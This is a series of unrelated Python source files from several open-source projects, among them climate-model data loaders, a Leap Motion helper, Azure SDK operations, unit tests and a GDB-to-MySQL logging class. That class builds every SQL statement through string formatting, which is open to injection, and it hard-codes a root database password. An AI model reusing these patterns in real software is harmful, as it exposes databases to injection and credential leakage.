mdata, retval = self._do_preprocessing(rawfile, 'swdown_acc', y1, y2, interval=interval, valid_mask=locdict['valid_mask'])
return mdata, retval
#-----------------------------------------------------------------------
def get_surface_shortwave_radiation_up(self, interval='monthly', **kwargs):
"""
get surface shortwave upward radiation data for JSBACH
Parameters
----------
interval : str
specifies the aggregation interval. Possible options: ['season','monthly']
"""
locdict = kwargs[self.type]
y1 = '1980-01-01' # TODO: move this to the JSON dictionary or some parameter file
y2 = '2010-12-31'
rawfile = self.data_dir + self.experiment + '_jsbach_' + y1[0: 4] + '_' + y2[0: 4] + '.nc'
mdata, retval = self._do_preprocessing(rawfile, 'swdown_reflect_acc', y1, y2, interval=interval, valid_mask=locdict['valid_mask'])
return mdata, retval
#-----------------------------------------------------------------------
def get_model_data_generic(self, interval='monthly', **kwargs):
"""
This is only a wrapper to redirect to individual functions
for the JSBACH_RAW class
Currently only the usage for rainfall is supported!
"""
        # HACK: only a wrapper, should be deprecated
raise ValueError('Rainfall analysis not working yet!')
self.get_rainfall_data(interval=interval, **kwargs)
def get_rainfall_data(self, interval='monthly', **kwargs):
"""
get surface rainfall data for JSBACH
uses already preprocessed data where the convective and
advective rainfall has been merged
Parameters
----------
interval : str
specifies the aggregation interval. Possible options: ['season','monthly']
"""
locdict = kwargs[self.type]
y1 = '1980-01-01' # TODO : move this to the JSON dictionary or some parameter file
y2 = '2010-12-31'
variable = 'aprc'
rawfile = self.data_dir + self.experiment + '_echam6_echam_*_precipitation.nc'
files = glob.glob(rawfile)
if len(files) != 1:
print 'Inputfiles: ', files
raise ValueError('Something went wrong: Invalid number of input files!')
else:
rawfile = files[0]
mdata, retval = self._do_preprocessing(rawfile, variable, y1, y2, interval=interval, valid_mask=locdict['valid_mask'])
return mdata, retval
#-----------------------------------------------------------------------
def get_gpp_data(self, interval='season'):
"""
get surface GPP data for JSBACH
todo temporal aggregation of data --> or leave it to the user!
"""
cdo = Cdo()
v = 'var167'
y1 = str(self.start_time)[0:10]
y2 = str(self.stop_time)[0:10]
rawfilename = self.data_dir + 'data/model/' + self.experiment + '_' + y1[0:4] + '-' + y2[0:4] + '.nc'
times_in_file = int(''.join(cdo.ntime(input=rawfilename)))
if interval == 'season':
if times_in_file != 4:
tmp_file = get_temporary_directory() + os.path.basename(rawfilename)
cdo.yseasmean(options='-f nc -b 32 -r ', input='-selvar,' + v + ' ' + rawfilename, output=tmp_file[:-3] + '_yseasmean.nc')
rawfilename = tmp_file[:-3] + '_yseasmean.nc'
if interval == 'monthly':
if times_in_file != 12:
tmp_file = get_temporary_directory() + os.path.basename(rawfilename)
cdo.ymonmean(options='-f nc -b 32 -r ', input='-selvar,' + v + ' ' + rawfilename, output=tmp_file[:-3] + '_ymonmean.nc')
rawfilename = tmp_file[:-3] + '_ymonmean.nc'
if not os.path.exists(rawfilename):
return None
filename = rawfilename
#--- read land-sea mask
ls_mask = get_T63_landseamask(self.shift_lon)
#--- read SW up data
gpp = Data4D(filename, v, read=True,
label=self.experiment + ' ' + v, unit='gC m-2 a-1', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data, scale_factor=3600. * 24. * 30. / 0.083
)
return gpp.sum_data4D()
#-----------------------------------------------------------------------
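# A minimal sketch of the albedo-as-flux-ratio idea used by the get_albedo_data()
# routines above, written with plain numpy arrays instead of pycmbs Data objects;
# the flux values are hypothetical and only illustrate the division with a guard
# against zero downward flux.
if __name__ == '__main__':
    import numpy as np
    sw_down = np.array([200.0, 250.0, 0.0])  # downward shortwave flux (W m-2), hypothetical
    sw_up = np.array([40.0, 60.0, 0.0])      # upward shortwave flux (W m-2), hypothetical
    with np.errstate(divide='ignore', invalid='ignore'):
        albedo = np.where(sw_down > 0., sw_up / sw_down, np.nan)
    print 'albedo:', albedo  # -> approximately [0.2, 0.24, nan]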
| pygeo/pycmbs | pycmbs/benchmarking/models/mpi_esm.py | Python | mit | 41,720 |
from threading import Lock
import requests
from api.decorator import critical_section
from api.importer import AdditionalDataImporter
from api.importer import AdditionalDataImporterError
from api.importer.wiktionary import dyn_backend
rmi_lock = Lock()
class DictionaryImporter(AdditionalDataImporter):
def populate_cache(self, language):
rq_params = {
'language': 'eq.' + language
}
response = requests.get(dyn_backend.backend + '/word', rq_params)
query = response.json()
for json in query:
self.word_id_cache[(json['word'], json['language'])] = json['id']
class TenyMalagasyImporter(DictionaryImporter):
data_type = 'tenymalagasy/definition'
class RakibolanaMalagasyImporter(DictionaryImporter):
data_type = 'rakibolana/definition'
@critical_section(rmi_lock)
def write_tif(self, title, language, additional_data):
temp = self.data_type
self.data_type = 'rakibolana/derived'
try:
self.write_additional_data(title, language, additional_data)
except AdditionalDataImporterError as exc:
pass
self.data_type = temp
@critical_section(rmi_lock)
def write_raw(self, title, language, additional_data):
temp = self.data_type
self.data_type = 'rakibolana/raw'
try:
self.write_additional_data(title, language, additional_data)
except AdditionalDataImporterError as exc:
pass
self.data_type = temp
def get_data(self, template_title: str, wikipage: str, language: str):
pass
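# A minimal usage sketch, kept as comments: the constructor arguments are
# inherited from AdditionalDataImporter and are not defined in this module,
# so they are left elided; the word and definition below are placeholders.
#
#   importer = RakibolanaMalagasyImporter(...)   # configured elsewhere
#   importer.populate_cache('mg')                # fill the (word, language) -> id cache
#   importer.write_raw('tondraka', 'mg', 'raw rakibolana definition text')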
| radomd92/botjagwar | api/importer/rakibolanamalagasy.py | Python | mit | 1,609 |
import math
class VirtualScreen: # this screen is normal to the Leap's Z axis
    def __init__(self,Xoffset=0,Yoffset=50,Zoffset=-50,Zlimit=220,length=350,height=300): # in mm
        self.Xoffset = Xoffset; # position of the middle of the screen's bottom edge relative to the Leap's center
        self.Yoffset = Yoffset; # position of the middle of the screen's bottom edge relative to the Leap's center
        self.Zoffset = Zoffset; # position of the middle of the screen's bottom edge relative to the Leap's center
        self.Zlimit = Zlimit # depth of the zone
self.length = length;
self.height = height;
self.UpperLeftCorner = [Xoffset-length/float(2),Yoffset+height]
self.Center = [self.Xoffset,self.Yoffset+0.5*self.height,Zoffset+0.5*Zlimit]
self.zoneUpperLeftCornerArray = [];
self.zoneHeight = height / float(2);
self.zoneLength = length / float(3);
for i in range(0,2):
for j in range(0,3):
self.zoneUpperLeftCornerArray.append([self.UpperLeftCorner[0]+self.zoneLength*j,self.UpperLeftCorner[1]-self.zoneHeight*i])
# print self.zoneUpperLeftCornerArray
def distanceFromScreen(self,position):
dX = max( max( position[0] - (self.Xoffset+self.length/float(2)), 0 ) , max (self.Xoffset-self.length/float(2) - position[0], 0 ) )
dY = max( max( position[1] - (self.Yoffset+self.height) , 0 ) , max (self.Yoffset - position[1], 0 ) )
dZ = max( max(self.Zoffset - position[2], 0 ) , max(position[2] - (self.Zlimit + self.Zoffset) , 0 ) )
return math.sqrt(dX**2+dY**2+dZ**2)
    def isFacingTheScreen(self,position): # takes a 3D position vector in mm along the Leap Motion axes ([x,y,z])
isXvalid = (position[0] <= self.Xoffset+self.length/float(2)) and (position[0] >= self.Xoffset-self.length/float(2))
isYvalid = (position[1] <= self.Yoffset+self.height) and (position[1] >= self.Yoffset)
isZvalid = (position[2] >= self.Zoffset) and (position[2] <= self.Zlimit + self.Zoffset)
return isXvalid and isYvalid and isZvalid
def getScreenZonePointedAt(self,position,direction):
if not self.isFacingTheScreen(position):
return -1
else:
            lambdaIntersection = (self.Zoffset-position[2])/direction[2] # (Zoffset - Zpoint) / Zdirection
            xIntersection = position[0] + lambdaIntersection*direction[0] # Xpoint + lambda * Xdirection
            yIntersection = position[1] + lambdaIntersection*direction[1] # Ypoint + lambda * Ydirection
intersection = [xIntersection,yIntersection]
return(self.getScreenZoneFromPointOnScreen(intersection))
def getScreenZoneFromPointOnScreen(self,onScreenPosition):
for index,i in enumerate(self.zoneUpperLeftCornerArray):
if(onScreenPosition[0]>=i[0] and onScreenPosition[0]<i[0]+self.zoneLength and onScreenPosition[1]<=i[1] and onScreenPosition[1]>=i[1]-self.zoneHeight):
return index+1
return -1
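# A minimal usage sketch, assuming the default screen geometry above; the palm
# position and pointing direction are made-up values (mm and a unit vector),
# of the kind a Leap Motion frame would provide.
if __name__ == '__main__':
    screen = VirtualScreen()
    position = [0.0, 150.0, 30.0]   # a point inside the interaction volume
    direction = [0.0, 0.0, -1.0]    # pointing straight at the screen plane
    print(screen.isFacingTheScreen(position))                  # True
    print(screen.getScreenZonePointedAt(position, direction))  # 5 (bottom-middle zone)
    print(screen.distanceFromScreen([0.0, 400.0, 30.0]))       # 50.0 mm above the top edge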
| IIazertyuiopII/PDS_sonification | python/VirtualScreen.py | Python | mit | 2,759 |
from rewpapi.common.http import Request
from rewpapi.listings.listing import ListingResidential
class RemoteListingImages(Request):
def __init__(self, base_site, auth, listing_type, listing_uuid):
super(RemoteListingImages, self).__init__(auth)
self._base_site = base_site
self._auth = auth
self._listing_type = listing_type
self._listing_uuid = listing_uuid
self._endpoint = base_site + "/api/listings/%s/%s/images/" % (
listing_type, listing_uuid)
def get_all(self):
"""
Returns a list of Listing images
"""
remote_listing_images = self.execute()
listing_images = []
if remote_listing_images:
for a in remote_listing_images:
new_listing_images = ListingImages(self._base_site, self._auth,
self._listing_type, self._listing_uuid)
new_listing_images.FIELDS = []
for k, v in a.items():
setattr(new_listing_images, k, v)
new_listing_images.FIELDS.append(k)
listing_images.append(new_listing_images)
return listing_images
return None
def get(self, uuid):
"""
Returns a single ListingImage instance, matching uuid.
Raises a DoesNotExist exception if the object does not exist.
"""
        # NOTE: placeholder implementation -- it ignores ``uuid`` and returns a
        # dummy ListingResidential rather than fetching the image from the API.
        b = ListingResidential()
        b.branch_name = "Foo"
        return b
class ListingImages(RemoteListingImages):
"""
A ListingImages object represents a Listing's images. Once instantiated,
you can:
- Change its values and send an update()
- Create it if it doesn't exist
"""
def set_fields(self, images):
self.images = images
def update(self):
"""
Update this listing's images.
"""
self._endpoint = self._base_site + "/api/listings/%s/%s/images/" % (
self._listing_type, self._listing_uuid)
images = []
for image in self.images:
image_dict = {}
image_dict['image'] = image.image
image_dict['caption'] = image.caption
image_dict['sha1'] = image.sha1
images.append(image_dict)
self.execute("PUT", images)
| propdata/rewp-api | rewpapi/listings/images.py | Python | mit | 2,288 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class CalculateExchangeOperations:
"""CalculateExchangeOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.reservations.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _post_initial(
self,
body: "_models.CalculateExchangeRequest",
**kwargs: Any
) -> Optional["_models.CalculateExchangeOperationResultResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.CalculateExchangeOperationResultResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-10-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._post_initial.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'CalculateExchangeRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CalculateExchangeOperationResultResponse', pipeline_response)
if response.status_code == 202:
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
response_headers['Location']=self._deserialize('str', response.headers.get('Location'))
response_headers['Retry-After']=self._deserialize('int', response.headers.get('Retry-After'))
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_post_initial.metadata = {'url': '/providers/Microsoft.Capacity/calculateExchange'} # type: ignore
async def begin_post(
self,
body: "_models.CalculateExchangeRequest",
**kwargs: Any
) -> AsyncLROPoller["_models.CalculateExchangeOperationResultResponse"]:
"""Calculates the refund amounts and price of the new purchases.
Calculates price for exchanging ``Reservations`` if there are no policy errors.
:param body: Request containing purchases and refunds that need to be executed.
:type body: ~azure.mgmt.reservations.models.CalculateExchangeRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either CalculateExchangeOperationResultResponse or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.reservations.models.CalculateExchangeOperationResultResponse]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.CalculateExchangeOperationResultResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._post_initial(
body=body,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('CalculateExchangeOperationResultResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_post.metadata = {'url': '/providers/Microsoft.Capacity/calculateExchange'} # type: ignore
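# A minimal async usage sketch, kept as comments: the client class name and the
# "calculate_exchange" attribute are assumptions based on the usual layout of
# generated azure-mgmt-* clients, and construction of the request body is elided.
#
#   from azure.mgmt.reservations.aio import AzureReservationAPI
#
#   async def run(credential, body):
#       async with AzureReservationAPI(credential) as client:
#           poller = await client.calculate_exchange.begin_post(body)
#           return await poller.result()  # CalculateExchangeOperationResultResponse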
| Azure/azure-sdk-for-python | sdk/reservations/azure-mgmt-reservations/azure/mgmt/reservations/aio/operations/_calculate_exchange_operations.py | Python | mit | 7,926 |
from __future__ import absolute_import
import unittest
import types
if __name__ == "__main__":
from optional import * #imports from package, not sub-module
else:
from .optional import *
from .nulltype import *
class TestNullType(unittest.TestCase):
def test_supertype(self):
self.assert_(isinstance(None, NullType))
self.assert_(isinstance(Optional('a'), NullType))
self.assert_(isinstance(NotPassed, NotPassedType))
self.assert_(isinstance(NotPassed, NullType))
self.assert_(issubclass(type(None), NullType))
self.assert_(issubclass(types.NoneType, NullType))
self.assert_(issubclass(Optional, NullType))
self.assert_(issubclass(NotPassedType, NullType))
class TestOptional(unittest.TestCase):
def setUp(self):
def myfunc(first, second=None, third=Optional(5), fourth=Optional(execute=list)):
#Equivalent: second = deoption(second, 5)
if isinstance(second, type(None)):
second = 5
third = deoption(third, 5)
fourth = deoption(fourth)
return first, second, third, fourth
self.myfunc = myfunc
self.expected = ('a', 5, 5, [])
self.ident = lambda: None
def _option_suite(self, value):
opt = Optional(value)
self.assert_(isinstance(opt, Optional))
self.assert_(isinstance(deoption(opt), type(value)))
self.assertEqual(deoption(opt), value)
def test_optional(self):
self._option_suite('a')
self._option_suite(5)
value = None
self._option_suite(value)
self.assertEqual(deoption(value, 'a'), 'a')
self._option_suite(dict)
self._option_suite(self.ident)
def test_execute(self):
opt = Optional(None, execute=dict)
self.assertEqual(deoption(opt), {})
self.assertEqual(deoption(opt, execute=dict), {})
self.assertEqual(deoption(None, execute=dict), {})
def test_optional_arguments(self):
self.assertEqual(self.myfunc('a'), self.expected)
self.assertEqual(self.myfunc('a', 5), self.expected)
self.assertEqual(self.myfunc('a', second=5), self.expected)
self.assertEqual(self.myfunc('a', 5, 5), self.expected)
self.assertEqual(self.myfunc('a', fourth=[]), self.expected)
def test_edges(self):
self.assertEqual(self.myfunc('a', third=None), self.expected)
def test_exceptions(self):
self.assert_(issubclass(DeoptionError, TypeError))
self.assertRaises(TypeError,
lambda: Optional()
)
self.assertRaises(TypeError,
lambda: Optional(NotPassed, NotPassed)
)
opt = Optional('a')
opt.default = NotPassed
self.assertRaises(DeoptionError,
lambda: opt.deoption()
)
self.assertRaises(DeoptionError,
lambda: deoption(None)
)
self.assertRaises(DeoptionError,
lambda: deoption(None, NotPassed, NotPassed)
)
self.assertRaises(DeoptionError,
lambda: deoption(NotPassed)
)
if __name__ == "__main__":
unittest.main() | OaklandPeters/optional | optional/test_optional.py | Python | mit | 3,279 |
# coding=utf-8
import pymysql
import PyGdbUtil
class PyGdbDb:
    # Initialization: connect to the database
def __init__(self, host, port, dbname, user, passwd):
self.project = None
self.table_prefix = None
try:
self.connection = pymysql.connect(
host=host, port=int(port), user=user, password=passwd, db=dbname, charset="utf8mb4")
self.cursor = self.connection.cursor()
except Exception as e_con:
print '数据库连接错误, 程序中止'
print e_con
exit(-1)
def test(self):
print '正在测试数据库连接'
print '数据库连接: ' + str(self.connection.get_host_info()) if self.connection else '数据库连接异常'
print '数据库游标: ' + str(self.cursor) if self.cursor else '数据库游标异常'
print '数据库连接测试完毕'
print '检查表 aabb 是否存在'
if self.exist_table('aabb'):
print '存在'
else:
print '不存在'
print '初始化项目 example'
self.init_project('example', 'example_')
self.new_project()
PyGdbUtil.log(0, '初始化完毕')
    # Initialize the project
def init_project(self, project_name, table_prefix):
self.project = project_name
self.table_prefix = table_prefix
    # Check whether the project exists; if not, create it and return True; if it exists, return False
def new_project(self):
if not self.table_prefix:
PyGdbUtil.log(2, '未指定数据库前缀')
exist_project = self.exist_table(self.table_prefix + 'BreakPoint')
        # create the database tables
if not exist_project:
self.create_table(self.table_prefix + "BreakPoint(bid INT AUTO_INCREMENT primary key, pid INT, lineNumber INT, funcName TEXT, funcList TEXT)")
self.create_table(self.table_prefix + "PStackSize(pid INT, tid INT, stackSize INT, pass TINYINT)")
self.create_table(self.table_prefix + "FStackSize(pid INT, tid INT, fid INT, stackSize INT)")
self.create_table(self.table_prefix + "FrameVariable(bid INT, varName CHAR, varValue TEXT, varSize INT)")
self.create_table(self.table_prefix + "FuncAdjacencyList(pid INT, tid INT, parFid INT, fid INT, cnt INT)")
self.create_table(self.table_prefix + "Function(fid INT, funcName CHAR(30))")
self.create_table(self.table_prefix + "TestCase(tid INT AUTO_INCREMENT primary key, testStr TEXT)")
self.commit()
return True
else:
return False
def clear_project(self):
if not self.table_prefix:
PyGdbUtil.log(2, '未指定数据库前缀')
exist_project = self.exist_table(self.table_prefix + 'BreakPoint')
if exist_project:
self.drop_table(self.table_prefix + "BreakPoint")
self.drop_table(self.table_prefix + "PStackSize")
self.drop_table(self.table_prefix + "FStackSize")
self.drop_table(self.table_prefix + "FrameVariable")
self.drop_table(self.table_prefix + "FuncAdjacencyList")
self.drop_table(self.table_prefix + "Function")
self.drop_table(self.table_prefix + "TestCase")
self.commit()
return True
else:
return False
    # Insert a test case
def insert_test_case(self, test_str):
self.execute("insert into " + self.table_prefix + "TestCase(testStr) VALUES('%s')" % test_str)
    # Insert a program breakpoint
def insert_breakpoint(self, pid, line_number, func_name):
        # return  # for testing
PyGdbUtil.log(0, str(pid) + " " + str(line_number) + " " + str(func_name))
self.execute("insert into " + self.table_prefix +
"BreakPoint(pid, lineNumber, funcName) VALUES (%s, %s, '%s')" % (pid, line_number, func_name))
    # Insert a function
def inset_function(self, fid, func_name):
self.execute('insert into ' + self.table_prefix +
'Function(fid, funcName) VALUES (%s, "%s")' % (fid, func_name))
    # Insert a single stack frame variable record
def insert_frame_var(self, bid, var_name, var_value, var_size):
self.execute('insert into ' + self.table_prefix +
'FrameVariable(bid, varName, varValue, varSize) ' +
'VALUES (%s, "%s", "%s", %s)' % (bid, var_name, var_value, var_size))
    # Insert a stack frame size
def insert_frame_stack_size(self, pid, tid, fid, size):
self.execute('insert into ' + self.table_prefix +
'FStackSize(pid, tid, fid, stackSize) VALUES (%s, %s, %s, %s)' %
(pid, tid, fid, size))
    # Insert the maximum stack size
def insert_max_stack_size(self, pid, tid, size):
self.execute('insert into ' + self.table_prefix +
'PStackSize(pid, tid, stackSize) VALUES (%s, %s, %s)' %(pid, tid, size))
    # Get the fid for a given function name
    def get_function_fid_by_name(self, func_name):
        self.execute('select fid from ' + self.table_prefix + 'Function where funcName="%s"' % str(func_name))
        fetch_one = self.cursor.fetchone()
        print "获取函数id: " + str(fetch_one[0])
        return fetch_one[0]
    # Get fid by bid
def get_fid_by_bid(self, bid):
self.execute('select funcName from ' + self.table_prefix + 'BreakPoint where bid=' + str(bid))
fetch_one = self.cursor.fetchone()
fid = self.get_fid_by_func_name(str(fetch_one[0]))
return fid
    # Get fid by function name
def get_fid_by_func_name(self, func_name):
self.execute('select fid from ' + self.table_prefix + 'Function where funcName="%s"' % (str(func_name)))
return self.cursor.fetchone()[0]
    # Insert breakpoints into the database
def info_breakpoint_handler(self, pid, gdb_info_breakpoint):
ss = gdb_info_breakpoint.split("\n")
for s in ss:
if 0 < s.find("breakpoint keep y"):
s2 = s.split()
s3 = s2[8].split(":")
self.insert_breakpoint(pid, s3[1], s2[6])
    # Add a directed edge a --> b
def insert_edge(self, pid, tid, func_name_a, func_name_b):
fid_a = self.get_fid_by_func_name(func_name_a)
fid_b = self.get_fid_by_func_name(func_name_b)
try:
self.execute('select cnt from ' + self.table_prefix +
'FuncAdjacencyList where pid=%s and tid=%s and parFid=%s and fid=%s' %
(pid, tid, fid_a, fid_b))
cnt = int(self.cursor.fetchone()[0]) + 1
self.execute('update ' + self.table_prefix +
'FuncAdjacencyList set cnt=%s where pid=%s and tid=%s and parFid=%s and fid=%s' %
(pid, tid, cnt, fid_a, fid_b))
except Exception:
cnt = 1
self.execute('insert into ' + self.table_prefix +
'FuncAdjacencyList(pid, tid, parFid, fid, cnt) VALUES (%s, %s, %s, %s, %s)' %
(pid, tid, fid_a, fid_b, cnt))
    # Get the function list from the gdb "info b" output
def get_function_list(self, break_info):
func_list = []
string_list = break_info.split('\n')[1:]
for line in string_list:
word = line.split()
if len(word) >= 6:
func_list.append(word[6])
return func_list
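    # Illustrative note (actual gdb output may differ slightly): for an
    # "info b" line such as
    #   "1  breakpoint  keep y  0x0000000000400a2e in main at test.c:10"
    # line.split() yields nine words, so word[6] above picks out the function
    # name ("main") and word[8] holds the "file:line" pair ("test.c:10").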
    # Insert the given function list into the database
def insert_function_list(self, func_list):
fid = 0
        func_list = list(set(func_list)) # remove duplicates
for func in func_list:
fid += 1
self.inset_function(fid, func)
    # Check whether a table exists
def exist_table(self, table_name):
try:
self.execute('select * from ' + table_name)
return True
except Exception:
return False
    # Create a table
def create_table(self, table_name):
try:
PyGdbUtil.log(0, "创建表" + table_name)
self.execute("create table if not exists " + table_name)
except Exception as e:
# print e
PyGdbUtil.log(2, "创建表" + table_name + "失败! 请检查数据表前缀是否有非法字符.")
    # Drop a table
def drop_table(self, table_name):
try:
PyGdbUtil.log(0, "删除表" + table_name)
self.execute('drop table if exists ' + table_name)
except Exception as e:
print e
PyGdbUtil.log(2, '删除表失败!')
    # Get a test case
def get_test_case_by_tid(self, tid):
self.execute("SELECT testStr FROM " + self.table_prefix + "TestCase WHERE tid='%s'" % tid)
return self.cursor.fetchone()[0]
    # Get the total number of test cases
def get_test_case_cnt(self):
self.execute('SELECT max(tid) FROM ' + self.table_prefix + 'TestCase')
return int(self.cursor.fetchone()[0])
    # Get the breakpoint list of a given program
def get_breakpoint_list(self, pid):
self.execute('SELECT lineNumber FROM ' + self.table_prefix + 'BreakPoint WHERE pid="%s"' % pid)
all = self.cursor.fetchall()
return [x[0] for x in all]
    # Execute an SQL statement
def execute(self, sql_cmd):
return self.cursor.execute(sql_cmd)
# commit 操作
def commit(self):
self.connection.commit()
"""
==================================================================
下方是 RestFul API 直接需要用到的 api
我擦, 这个好像应该放到另一个工程里面 - -#
==================================================================
"""
# getWorstStackSize(String program String t1){} input1+program getWorstStackSize(){}
# tid + pid --> Worst Stack Size
def api_worst_stack_size(self, pid, tid):
pass
def api_max_stack_size(self, pid, tid, fid):
pass
    # Given the pid of the correct program, the pid of the program to compare, and a set of test cases (tid list), return a True/False table of whether each run succeeded
def api_result(self, correct_pid, test_pid, tid_list):
pass
    # Return the program's breakpoint list
def api_breakpoint_list(self, pid, tid):
pass
    # Function stack list at a breakpoint
def api_breakpoint_func_list(self, pid, breakpoint):
pass
    # Stack frame information at a breakpoint
def api_breakpoint_frame_info(self, pid, breakpoint):
pass
    # Return the adjacency list of the function call graph
def api_function_graph(self, pid, tid):
pass
    # Return the function list
def api_function_list(self, pid):
pass
if __name__ == '__main__':
print "PyGDB Database 测试模式"
try:
dbc = PyGdbDb('127.0.0.1', '3306', 'pygdb', 'root', 'Sbdljw1992')
print '数据库连接成功'
dbc.test()
dbc.connection.close()
print '数据库连接断开成功'
except Exception as e:
print '严重错误: ' + str(e)
exit(-1)
| Jecvay/PyGDB | PyGdbDb.py | Python | mit | 10,962 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import root
import j
| tonghuashuai/OnlyBoard | controller/_url.py | Python | mit | 68 |
#!../../../.env/bin/python
import os
import numpy as np
import time
a = np.array([
[1,0,3],
[0,2,1],
[0.1,0,0],
])
print a
row = 1
col = 2
print a[row][col]
assert a[row][col] == 1
expected_max_rows = [0, 1, 0]
expected_max_values = [1, 2, 3]
print 'expected_max_rows:', expected_max_rows
print 'expected_max_values:', expected_max_values
t0 = time.time()
actual_max_rows = list(np.argmax(a, axis=0))
td = time.time() - t0
actual_max_values = list(np.amax(a, axis=0))
print 'td:', round(td, 4)
print 'actual_max_rows:', actual_max_rows
print 'actual_max_values:', actual_max_values
assert actual_max_rows == expected_max_rows
assert actual_max_values == expected_max_values
| chrisspen/homebot | src/test/max_column/test_max_column.py | Python | mit | 690 |
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns(
'',
url(r'', include('frontpage.urls')),
url(r'^auth/', include('social.apps.django_app.urls', namespace='social')),
url(r'^admin/', include(admin.site.urls)),
url(r'^logout/$', 'django.contrib.auth.views.logout', {'next_page': '/'}, name='logout'),
)
| cncdnua/cncdnua | cncdnua/cncdnua/urls.py | Python | mit | 405 |
import fetchopenfmri.fetch
| wiheto/fetchopenfmri | fetchopenfmri/__init__.py | Python | mit | 28 |
"""
To run this test, type this in the command line: <kolibri manage test -- kolibri.core.content>
"""
import datetime
import unittest
import uuid
import mock
import requests
from django.conf import settings
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.test import TestCase
from django.utils import timezone
from le_utils.constants import content_kinds
from rest_framework import status
from rest_framework.test import APITestCase
from kolibri.core.auth.models import Facility
from kolibri.core.auth.models import FacilityUser
from kolibri.core.auth.test.helpers import provision_device
from kolibri.core.content import models as content
from kolibri.core.content.test.test_channel_upgrade import ChannelBuilder
from kolibri.core.device.models import DevicePermissions
from kolibri.core.device.models import DeviceSettings
from kolibri.core.logger.models import ContentSessionLog
from kolibri.core.logger.models import ContentSummaryLog
DUMMY_PASSWORD = "password"
class ContentNodeTestBase(object):
"""
    Base test case for content metadata methods
"""
def test_get_prerequisites_for(self):
"""
test the directional characteristic of prerequisite relationship
"""
c1 = content.ContentNode.objects.get(title="c1")
root = content.ContentNode.objects.get(title="root")
# if root is the prerequisite of c1
expected_output = content.ContentNode.objects.filter(title__in=["root"])
actual_output = content.ContentNode.objects.filter(prerequisite_for=c1)
self.assertEqual(set(expected_output), set(actual_output))
# then c1 should not be the prerequisite of root
unexpected_output = content.ContentNode.objects.filter(title__in=["c1"])
actual_output = content.ContentNode.objects.filter(prerequisite_for=root)
self.assertNotEqual(set(actual_output), set(unexpected_output))
def test_get_has_prerequisites(self):
"""
test the directional characteristic of prerequisite relationship
"""
